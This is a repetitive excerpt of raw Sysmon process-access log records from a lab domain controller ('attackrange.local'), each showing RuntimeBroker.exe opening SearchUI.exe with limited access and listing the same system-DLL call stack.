13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
